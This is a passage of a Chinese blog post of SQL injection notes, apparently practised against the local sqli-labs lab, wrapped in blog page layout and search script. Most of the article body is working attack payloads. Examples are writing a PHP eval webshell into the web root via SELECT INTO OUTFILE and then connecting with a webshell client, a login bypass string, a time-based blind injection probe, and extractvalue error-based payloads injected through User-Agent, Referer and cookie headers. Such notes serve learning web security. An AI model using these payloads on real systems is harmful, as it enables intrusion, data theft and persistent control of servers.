<p>在注入过程中， 我们往往需要一些特殊的文件， 比如配置文件， 密码文件等。 当你具有数据<br>库的权限时， 可以将系统文件利用 load data infile 导入到数据库中。 </p>
<p>示例： load data infile ‘/tmp/t0.txt’ ignore into table t0 character set gbk fields terminated by ‘\t’<br>lines terminated by ‘\n’ </p>
<p>将/tmp/t0.txt 导入到 t0 表中， character set gbk 是字符集设置为 gbk， fields terminated by 是<br>每一项数据之间的分隔符， lines terminated by 是行的结尾符。 </p>
<p>当错误代码是 2 的时候的时候， 文件不存在， 错误代码为 13 的时候是没有权限， 可以考虑<br>/tmp 等文件夹。 </p>
<h4 id="3、-导入到文件"><a href="#3、-导入到文件" class="headerlink" title="3、 导入到文件"></a>3、 导入到文件</h4><p>SELECT…..INTO OUTFILE ‘file_name’ </p>
<p>可以把被选择的行写入一个文件中。 该文件被创建到服务器主机上， 因此您必须拥有 FILE<br>权限， 才能使用此语法。 file_name 不能是一个已经存在的文件。 </p>
<p>有两种形式：</p>
<p>第一种直接将 select 内容导入到文件中： </p>
<p>Select version() into outfile “c:\phpnow\htdocs\test.php”<br>此处将 version()替换成一句话， <?php @eval($_post[“mima”])?>也即<br>Select <?php @eval($_post[“mima”])?> into outfile “c:\phpnow\htdocs\test.php” </p>
<p>然后直接连一句话</p>
<p>第二种修改文件结尾：<br>Select version() Into outfile “c:\phpnow\htdocs\test.php” LINES TERMINATED BY 0x16 进制文<br>件 解<br>释： 通常是用‘\r\n’ 结尾， 此处我们修改为自己想要的任何文件。 同时可以用 FIELDS<br>TERMINATED BY16 进制可以为一句话或者其他任何的代码， 可自行构造。 在 sqlmap 中 os-shell 采取的就是<br>这样的方式， 具体可参考 os-shell 分析文章： <a href="http://www.cnblogs.com/lcamry/p/5505110.html" target="_blank" rel="noopener">http://www.cnblogs.com/lcamry/p/5505110.html</a> </p>
<p><img src="/2019/09/01/sql注入的payload/1568333523800.png" alt="1568333523800"></p>
<p><img src="/2019/09/01/sql注入的payload/1568333585447.png" alt="1568333585447"></p>
<p><a href="http://127.0.0.1/sqllib/Less-7/" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-7/</a><br>?id=1’)) UNION SELECT 1,2,3 into outfile “E:\WEB\XMAPP\htdocs\sqllib\Less-7\test.txt” –+ </p>
<p><img src="/2019/09/01/sql注入的payload/1568343567756.png" alt="1568343567756"></p>
<p>写入一句话木马</p>
<p><a href="http://127.0.0.1/sqllib/Less-7/" target="_blank" rel="noopener">http://127.0.0.1/sqllib/Less-7/</a><br>?id=1’)) UNION SELECT 1,2,’<?php @eval($_post["mima" ])?>‘ into outfile “E:\WEB\XMAPP\htdocs\sqllib\Less-7\test.php” –+ </p>
<p><img src="/2019/09/01/sql注入的payload/1568343980260.png" alt="1568343980260"></p>
<p>后续就可以上菜刀了</p>
<h2 id="POST-注入"><a href="#POST-注入" class="headerlink" title="POST 注入"></a>POST 注入</h2><p>输入正确用户名和密码</p>
<p><img src="/2019/09/01/sql注入的payload/1568358189109.png" alt="1568358189109"></p>
<p>提交 username 和 password 后， 后台形成的 sql 语句为 </p>
<p>$sql=”SELECT username, password FROM users WHERE username=’admin’ and password=’$passwd’ LIMIT 0,1”; </p>
<p>万能密码: </p>
<p>用户名：admin’or’1’=’1#          admin ‘ #      密码：密码随便输入</p>
<p>$sql=”SELECT username, password FROM users WHERE username=’admin’or’1’=’1# and password=’$passwd’ LIMIT 0,1”; </p>
<p>猜测数据库第一位</p>
<p>uname=admin’and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&amp;passwd=11&amp;submit=Submit</p>
<h2 id="增删改函数介绍"><a href="#增删改函数介绍" class="headerlink" title="增删改函数介绍"></a>增删改函数介绍</h2><ol>
<li><p>增加一行数据 INSERT</p>
<p>insert into users values(‘16’,’lcamry’,’lcamry’); </p>
<p><img src="/2019/09/01/sql注入的payload/1568360532191.png" alt="1568360532191"></p>
</li>
<li><p>删除一行数据</p>
</li>
</ol>
<p>   ​        <img src="/2019/09/01/sql注入的payload/1568360638213.png" alt="1568360638213"></p>
<ol start="3">
<li><p>修改一行数据 updata 表名 set 列名=’新的值， 非数字加单引号’ where id=6; </p>
<p><img src="/2019/09/01/sql注入的payload/1568360761583.png" alt="1568360761583"></p>
</li>
</ol>
<h2 id="HTTP-头部注入"><a href="#HTTP-头部注入" class="headerlink" title="HTTP 头部注入"></a>HTTP 头部注入</h2><h5 id="User-Agent-注入"><a href="#User-Agent-注入" class="headerlink" title="User-Agent 注入"></a>User-Agent 注入</h5><p><img src="/2019/09/01/sql注入的payload/1568379645084.png" alt="1568379645084"></p>
<p> payload:</p>
<p>‘and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and ‘1’=’1 </p>
<h5 id="Referer-注入"><a href="#Referer-注入" class="headerlink" title="Referer 注入"></a>Referer 注入</h5><p><img src="/2019/09/01/sql注入的payload/1568380310301.png" alt="1568380310301"></p>
<p>payload:</p>
<p>‘and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and ‘1’=’1 </p>
<h5 id="cookie-注入-报错了"><a href="#cookie-注入-报错了" class="headerlink" title="cookie 注入  报错了"></a>cookie 注入  报错了</h5><hr>
<p><img src="/2019/09/01/sql注入的payload/1568381361835.png" alt="1568381361835"></p>
<p>payload:</p>
<p>‘and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and ‘1’=’1 </p>
<h1 id="第二部分：高级注入"><a href="#第二部分：高级注入" class="headerlink" title="第二部分：高级注入"></a>第二部分：高级注入</h1>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/31/LNMP环境搭建/" rel="next" title="LNMP环境搭建">
                <i class="fa fa-chevron-left"></i> LNMP环境搭建
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/cat.jpg" alt="ZSC0810">
            
              <p class="site-author-name" itemprop="name">ZSC0810</p>
              <p class="site-description motion-element" itemprop="description">加油！</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#第一部分：基础"><span class="nav-number">1.</span> <span class="nav-text">第一部分：基础</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1、注入的分类："><span class="nav-number">1.1.</span> <span class="nav-text">1、注入的分类：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#基于从服务器接收到的响应"><span class="nav-number">1.1.1.</span> <span class="nav-text">基于从服务器接收到的响应</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于如何处理输入的-SQL-查询（数据类型）"><span class="nav-number">1.1.2.</span> <span class="nav-text">基于如何处理输入的 SQL 查询（数据类型）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于程度和顺序的注入-哪里发生了影响"><span class="nav-number">1.1.3.</span> <span class="nav-text">基于程度和顺序的注入(哪里发生了影响)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于注入点的位置上的"><span class="nav-number">1.1.4.</span> <span class="nav-text">基于注入点的位置上的</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2、系统函数"><span class="nav-number">1.2.</span> <span class="nav-text">2、系统函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3、字符串连接函数"><span class="nav-number">1.3.</span> <span class="nav-text">3、字符串连接函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4、一般用于尝试的语句"><span class="nav-number">1.4.</span> <span class="nav-text">4、一般用于尝试的语句</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5、union-操作符的介绍"><span class="nav-number">1.5.</span> <span class="nav-text">5、union 操作符的介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-、sql-中的逻辑运算"><span class="nav-number">1.6.</span> <span class="nav-text">6 、sql 中的逻辑运算</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7、-注入流程"><span class="nav-number">1.7.</span> <span class="nav-text">7、 注入流程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#1-联合查询的类型"><span class="nav-number">2.</span> <span class="nav-text">1 联合查询的类型</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-盲注"><span class="nav-number">3.</span> <span class="nav-text">2 盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1：-基于布尔-SQL-盲注-构造逻辑判断"><span class="nav-number">3.0.1.</span> <span class="nav-text">1： 基于布尔 SQL 盲注-构造逻辑判断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2：-基于报错的-SQL-盲注-构造-payload-让信息通过错误提示回显出来-存疑"><span class="nav-number">3.0.2.</span> <span class="nav-text">2： 基于报错的 SQL 盲注-构造 payload 让信息通过错误提示回显出来  存疑</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-基于时间的-SQL-盲注–延时注入"><span class="nav-number">3.0.3.</span> <span class="nav-text">3:基于时间的 SQL 盲注–延时注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#布尔盲注演示"><span class="nav-number">3.0.3.1.</span> <span class="nav-text">布尔盲注演示</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#报错盲注演示"><span class="nav-number">3.0.3.2.</span> <span class="nav-text">报错盲注演示</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#演示盲注演示"><span class="nav-number">3.0.3.3.</span> <span class="nav-text">演示盲注演示</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-文件的导入导出"><span class="nav-number">3.1.</span> <span class="nav-text">3 文件的导入导出</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、-load-file-导出文件"><span class="nav-number">3.1.0.1.</span> <span class="nav-text">1、 load_file()导出文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、-文件导入到数据库"><span class="nav-number">3.1.0.2.</span> <span class="nav-text">2、 文件导入到数据库</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、-导入到文件"><span class="nav-number">3.1.0.3.</span> <span class="nav-text">3、 导入到文件</span></a></li></ol></li></ol><li class="nav-item nav-level-2"><a class="nav-link" href="#POST-注入"><span class="nav-number">3.2.</span> <span class="nav-text">POST 注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#增删改函数介绍"><span class="nav-number">3.3.</span> <span class="nav-text">增删改函数介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HTTP-头部注入"><span class="nav-number">3.4.</span> <span class="nav-text">HTTP 头部注入</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#User-Agent-注入"><span class="nav-number">3.4.0.0.1.</span> <span class="nav-text">User-Agent 注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Referer-注入"><span class="nav-number">3.4.0.0.2.</span> <span class="nav-text">Referer 注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#cookie-注入-报错了"><span class="nav-number">3.4.0.0.3.</span> <span class="nav-text">cookie 注入  报错了</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#第二部分：高级注入"><span class="nav-number">4.</span> <span class="nav-text">第二部分：高级注入</span></a></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ZSC0810</span>

  
</div>









        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
